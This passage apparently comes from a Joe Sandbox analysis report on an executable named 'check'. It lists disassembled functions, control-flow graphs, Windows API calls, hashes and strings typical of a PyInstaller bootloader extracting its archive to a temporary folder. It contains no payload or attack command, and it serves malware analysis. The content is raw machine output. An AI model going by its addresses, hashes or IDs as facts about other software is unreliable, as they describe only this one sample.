                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                                                                                                          • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                          • Instruction ID: 9abea941ab655f2d572e1e9051e47f2496f2152782f31915228aa1dcab15f760
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6028022F1DE4641FA55BF219891279E680AF41BF0FC586B4DE5D863D1EEFCA849C320
                                                                                                                                                                                                                                          Function 00007FF7124F1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 331 7ff7124f1950-7ff7124f198b call 7ff7124f45c0 334 7ff7124f1991-7ff7124f19d1 call 7ff7124f7f90 331->334 335 7ff7124f1c4e-7ff7124f1c72 call 7ff7124fc550 331->335 340 7ff7124f1c3b-7ff7124f1c3e call 7ff71250004c 334->340 341 7ff7124f19d7-7ff7124f19e7 call 7ff7125006d4 334->341 345 7ff7124f1c43-7ff7124f1c4b 340->345 346 7ff7124f19e9-7ff7124f1a03 call 7ff712504f08 call 7ff7124f2910 341->346 347 7ff7124f1a08-7ff7124f1a24 call 7ff71250039c 341->347 345->335 346->340 352 7ff7124f1a45-7ff7124f1a5a call 7ff712504f28 347->352 353 7ff7124f1a26-7ff7124f1a40 call 7ff712504f08 call 7ff7124f2910 347->353 361 7ff7124f1a7b-7ff7124f1afc call 7ff7124f1c80 * 2 call 7ff7125006d4 352->361 362 7ff7124f1a5c-7ff7124f1a76 call 7ff712504f08 call 7ff7124f2910 352->362 353->340 373 7ff7124f1b01-7ff7124f1b14 call 7ff712504f44 361->373 362->340 376 7ff7124f1b35-7ff7124f1b4e call 7ff71250039c 373->376 377 7ff7124f1b16-7ff7124f1b30 call 7ff712504f08 call 7ff7124f2910 373->377 383 7ff7124f1b6f-7ff7124f1b8b call 7ff712500110 376->383 384 7ff7124f1b50-7ff7124f1b6a call 7ff712504f08 call 7ff7124f2910 376->384 377->340 391 7ff7124f1b8d-7ff7124f1b99 call 7ff7124f2710 383->391 392 7ff7124f1b9e-7ff7124f1bac 383->392 384->340 391->340 392->340 395 7ff7124f1bb2-7ff7124f1bb9 392->395 397 7ff7124f1bc1-7ff7124f1bc7 395->397 398 7ff7124f1be0-7ff7124f1bef 397->398 399 7ff7124f1bc9-7ff7124f1bd6 397->399 398->398 400 7ff7124f1bf1-7ff7124f1bfa 398->400 399->400 401 7ff7124f1c0f 400->401 402 7ff7124f1bfc-7ff7124f1bff 400->402 404 7ff7124f1c11-7ff7124f1c24 401->404 402->401 403 7ff7124f1c01-7ff7124f1c04 402->403 403->401 405 7ff7124f1c06-7ff7124f1c09 403->405 406 7ff7124f1c26 404->406 407 7ff7124f1c2d-7ff7124f1c39 404->407 405->401 408 7ff7124f1c0b-7ff7124f1c0d 405->408 406->407 407->340 407->397 408->404
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F7F90: _fread_nolock.LIBCMT ref: 00007FF7124F803A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF7124F1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: a8b86eb550c1a32345a99423d1f2e3a7bd87565da5f631defffb38c54431dd0a
                                                                                                                                                                                                                                          • Instruction ID: d27cb7974da7f77c1c872de6d11cb7419305b0380561055176f6cf65dfd59ab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8b86eb550c1a32345a99423d1f2e3a7bd87565da5f631defffb38c54431dd0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15817371A0CE8686EB20FF18D4806B9A391EF857A4F844431DD8D47785EEBCE959C760
                                                                                                                                                                                                                                          Function 00007FF7124F1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 409 7ff7124f1600-7ff7124f1611 410 7ff7124f1613-7ff7124f161c call 7ff7124f1050 409->410 411 7ff7124f1637-7ff7124f1651 call 7ff7124f45c0 409->411 418 7ff7124f162e-7ff7124f1636 410->418 419 7ff7124f161e-7ff7124f1629 call 7ff7124f2710 410->419 416 7ff7124f1653-7ff7124f1681 call 7ff712504f08 call 7ff7124f2910 411->416 417 7ff7124f1682-7ff7124f169c call 7ff7124f45c0 411->417 426 7ff7124f169e-7ff7124f16b3 call 7ff7124f2710 417->426 427 7ff7124f16b8-7ff7124f16cf call 7ff7125006d4 417->427 419->418 433 7ff7124f1821-7ff7124f1824 call 7ff71250004c 426->433 434 7ff7124f16d1-7ff7124f16f4 call 7ff712504f08 call 7ff7124f2910 427->434 435 7ff7124f16f9-7ff7124f16fd 427->435 443 7ff7124f1829-7ff7124f183b 433->443 448 7ff7124f1819-7ff7124f181c call 7ff71250004c 434->448 437 7ff7124f16ff-7ff7124f170b call 7ff7124f1210 435->437 438 7ff7124f1717-7ff7124f1737 call 7ff712504f44 435->438 445 7ff7124f1710-7ff7124f1712 437->445 449 7ff7124f1761-7ff7124f176c 438->449 450 7ff7124f1739-7ff7124f175c call 7ff712504f08 call 7ff7124f2910 438->450 445->448 448->433 451 7ff7124f1802-7ff7124f180a call 7ff712504f30 449->451 452 7ff7124f1772-7ff7124f1777 449->452 462 7ff7124f180f-7ff7124f1814 450->462 451->462 455 7ff7124f1780-7ff7124f17a2 call 7ff71250039c 452->455 464 7ff7124f17a4-7ff7124f17bc call 7ff712500adc 455->464 465 7ff7124f17da-7ff7124f17e6 call 7ff712504f08 455->465 462->448 471 7ff7124f17c5-7ff7124f17d8 call 7ff712504f08 464->471 472 7ff7124f17be-7ff7124f17c1 464->472 470 7ff7124f17ed-7ff7124f17f8 call 7ff7124f2910 465->470 477 7ff7124f17fd 470->477 471->470 472->455 474 7ff7124f17c3 472->474 474->477 477->451
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                          • Opcode ID: 67f307aff301c3b5259a166279c8bfead24a4c5500050025e5effee45cc36a5c
                                                                                                                                                                                                                                          • Instruction ID: d2733d907776ed616e4da351ef52fbd9554f59ab805e5ce79e08f7dffc8e8171
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67f307aff301c3b5259a166279c8bfead24a4c5500050025e5effee45cc36a5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01517061B08E4392EB10BB5598905B9A390BF85BB4FC44531EE0C47796EEBCE96DC720
                                                                                                                                                                                                                                          Function 00007FF7124F8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F8704
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7124F3CBB), ref: 00007FF7124F870A
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7124F3CBB), ref: 00007FF7124F874C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8830: GetEnvironmentVariableW.KERNEL32(00007FF7124F388E), ref: 00007FF7124F8867
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7124F8889
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712508238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF712508251
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                          • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                          • Instruction ID: 1ed7cfb4f496616f97f87241065266e5ee8a6aee16e0efe9cf3ff2c40058ccc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A419411B19E5254FB20FB2998952B99291AF897F0FC04131ED0D4B7D6EEBCE91DC320
                                                                                                                                                                                                                                          Function 00007FF7124F1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 756 7ff7124f1210-7ff7124f126d call 7ff7124fbd80 759 7ff7124f126f-7ff7124f1296 call 7ff7124f2710 756->759 760 7ff7124f1297-7ff7124f12af call 7ff712504f44 756->760 765 7ff7124f12d4-7ff7124f12e4 call 7ff712504f44 760->765 766 7ff7124f12b1-7ff7124f12cf call 7ff712504f08 call 7ff7124f2910 760->766 771 7ff7124f12e6-7ff7124f1304 call 7ff712504f08 call 7ff7124f2910 765->771 772 7ff7124f1309-7ff7124f131b 765->772 779 7ff7124f1439-7ff7124f144e call 7ff7124fba60 call 7ff712504f30 * 2 766->779 771->779 775 7ff7124f1320-7ff7124f1345 call 7ff71250039c 772->775 785 7ff7124f1431 775->785 786 7ff7124f134b-7ff7124f1355 call 7ff712500110 775->786 793 7ff7124f1453-7ff7124f146d 779->793 785->779 786->785 792 7ff7124f135b-7ff7124f1367 786->792 794 7ff7124f1370-7ff7124f1398 call 7ff7124fa1c0 792->794 797 7ff7124f1416-7ff7124f142c call 7ff7124f2710 794->797 798 7ff7124f139a-7ff7124f139d 794->798 797->785 799 7ff7124f1411 798->799 800 7ff7124f139f-7ff7124f13a9 798->800 799->797 802 7ff7124f13d4-7ff7124f13d7 800->802 803 7ff7124f13ab-7ff7124f13b9 call 7ff712500adc 800->803 805 7ff7124f13d9-7ff7124f13e7 call 7ff712519e30 802->805 806 7ff7124f13ea-7ff7124f13ef 802->806 807 7ff7124f13be-7ff7124f13c1 803->807 805->806 806->794 809 7ff7124f13f5-7ff7124f13f8 806->809 810 7ff7124f13c3-7ff7124f13cd call 7ff712500110 807->810 811 7ff7124f13cf-7ff7124f13d2 807->811 813 7ff7124f140c-7ff7124f140f 809->813 814 7ff7124f13fa-7ff7124f13fd 809->814 810->806 810->811 811->797 813->785 814->797 815 7ff7124f13ff-7ff7124f1407 814->815 815->775
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 8268f1b30061614da7bde4472bcd22e6be42c020a5520dbe929a00b884bf6911
                                                                                                                                                                                                                                          • Instruction ID: 66b2bf1aa586a7680bc42a5a2c4e1161d98b0d99462cbac5181fddeb7c46a5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8268f1b30061614da7bde4472bcd22e6be42c020a5520dbe929a00b884bf6911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51D322A08E4241EB21BF15A8803BAA291FFC67A4FC44131ED4D477C5EEBCE959C720
                                                                                                                                                                                                                                          Function 00007FF71250ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71250F0AA,?,?,-00000018,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE8C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71250F0AA,?,?,-00000018,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction ID: 6f80c86179e1a5dbb922743ee40829bb654f5e7b51f253034b71fd84d99f8ef8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6411322B09E0281EB15EF16AC80575B291BF48BB0FD84179DD1D47794FEBCE80DD228
                                                                                                                                                                                                                                          Function 00007FF7124F36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction ID: 71ae712518d8870dd7aabf1224259b029d151d58a96f7cdde2afdbf427693f4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47219A61B1CD4241FB20BB28E8513B6A290BFC8375FC04132DD5D865D5EEACE91CC725
                                                                                                                                                                                                                                          Function 00007FF71250BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 901 7ff71250ba5c-7ff71250ba82 902 7ff71250ba9d-7ff71250baa1 901->902 903 7ff71250ba84-7ff71250ba98 call 7ff712504ee8 call 7ff712504f08 901->903 904 7ff71250be77-7ff71250be83 call 7ff712504ee8 call 7ff712504f08 902->904 905 7ff71250baa7-7ff71250baae 902->905 917 7ff71250be8e 903->917 924 7ff71250be89 call 7ff71250a8e0 904->924 905->904 907 7ff71250bab4-7ff71250bae2 905->907 907->904 910 7ff71250bae8-7ff71250baef 907->910 913 7ff71250bb08-7ff71250bb0b 910->913 914 7ff71250baf1-7ff71250bb03 call 7ff712504ee8 call 7ff712504f08 910->914 920 7ff71250bb11-7ff71250bb17 913->920 921 7ff71250be73-7ff71250be75 913->921 914->924 922 7ff71250be91-7ff71250bea8 917->922 920->921 925 7ff71250bb1d-7ff71250bb20 920->925 921->922 924->917 925->914 928 7ff71250bb22-7ff71250bb47 925->928 930 7ff71250bb49-7ff71250bb4b 928->930 931 7ff71250bb7a-7ff71250bb81 928->931 934 7ff71250bb4d-7ff71250bb54 930->934 935 7ff71250bb72-7ff71250bb78 930->935 932 7ff71250bb83-7ff71250bbab call 7ff71250d5fc call 7ff71250a948 * 2 931->932 933 7ff71250bb56-7ff71250bb6d call 7ff712504ee8 call 7ff712504f08 call 7ff71250a8e0 931->933 966 7ff71250bbc8-7ff71250bbf3 call 7ff71250c284 932->966 967 7ff71250bbad-7ff71250bbc3 call 7ff712504f08 call 7ff712504ee8 932->967 963 7ff71250bd00 933->963 934->933 934->935 937 7ff71250bbf8-7ff71250bc0f 935->937 940 7ff71250bc8a-7ff71250bc94 call 7ff71251391c 937->940 941 7ff71250bc11-7ff71250bc19 937->941 952 7ff71250bc9a-7ff71250bcaf 940->952 953 7ff71250bd1e 940->953 941->940 945 7ff71250bc1b-7ff71250bc1d 941->945 945->940 949 7ff71250bc1f-7ff71250bc35 945->949 949->940 954 7ff71250bc37-7ff71250bc43 949->954 952->953 958 7ff71250bcb1-7ff71250bcc3 GetConsoleMode 952->958 956 7ff71250bd23-7ff71250bd43 ReadFile 953->956 954->940 959 7ff71250bc45-7ff71250bc47 954->959 961 7ff71250bd49-7ff71250bd51 956->961 962 7ff71250be3d-7ff71250be46 GetLastError 956->962 958->953 964 7ff71250bcc5-7ff71250bccd 958->964 959->940 965 7ff71250bc49-7ff71250bc61 959->965 961->962 969 7ff71250bd57 961->969 972 7ff71250be48-7ff71250be5e call 7ff712504f08 call 7ff712504ee8 962->972 973 7ff71250be63-7ff71250be66 962->973 974 7ff71250bd03-7ff71250bd0d call 7ff71250a948 963->974 964->956 971 7ff71250bccf-7ff71250bcf1 ReadConsoleW 964->971 965->940 975 7ff71250bc63-7ff71250bc6f 965->975 966->937 967->963 979 7ff71250bd5e-7ff71250bd73 969->979 981 7ff71250bd12-7ff71250bd1c 971->981 982 7ff71250bcf3 GetLastError 971->982 972->963 976 7ff71250bcf9-7ff71250bcfb call 7ff712504e7c 973->976 977 7ff71250be6c-7ff71250be6e 973->977 974->922 975->940 985 7ff71250bc71-7ff71250bc73 975->985 976->963 977->974 979->974 988 7ff71250bd75-7ff71250bd80 979->988 981->979 982->976 985->940 986 7ff71250bc75-7ff71250bc85 985->986 986->940 993 7ff71250bda7-7ff71250bdaf 988->993 994 7ff71250bd82-7ff71250bd9b call 7ff71250b674 988->994 997 7ff71250be2b-7ff71250be38 call 7ff71250b4b4 993->997 998 7ff71250bdb1-7ff71250bdc3 993->998 1001 7ff71250bda0-7ff71250bda2 994->1001 997->1001 1002 7ff71250be1e-7ff71250be26 998->1002 1003 7ff71250bdc5 998->1003 1001->974 1002->974 1005 7ff71250bdca-7ff71250bdd1 1003->1005 1006 7ff71250be0d-7ff71250be18 1005->1006 1007 7ff71250bdd3-7ff71250bdd7 1005->1007 1006->1002 1008 7ff71250bdd9-7ff71250bde0 1007->1008 1009 7ff71250bdf3 1007->1009 1008->1009 1011 7ff71250bde2-7ff71250bde6 1008->1011 1010 7ff71250bdf9-7ff71250be09 1009->1010 1010->1005 1013 7ff71250be0b 1010->1013 1011->1009 1012 7ff71250bde8-7ff71250bdf1 1011->1012 1012->1010 1013->1002
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
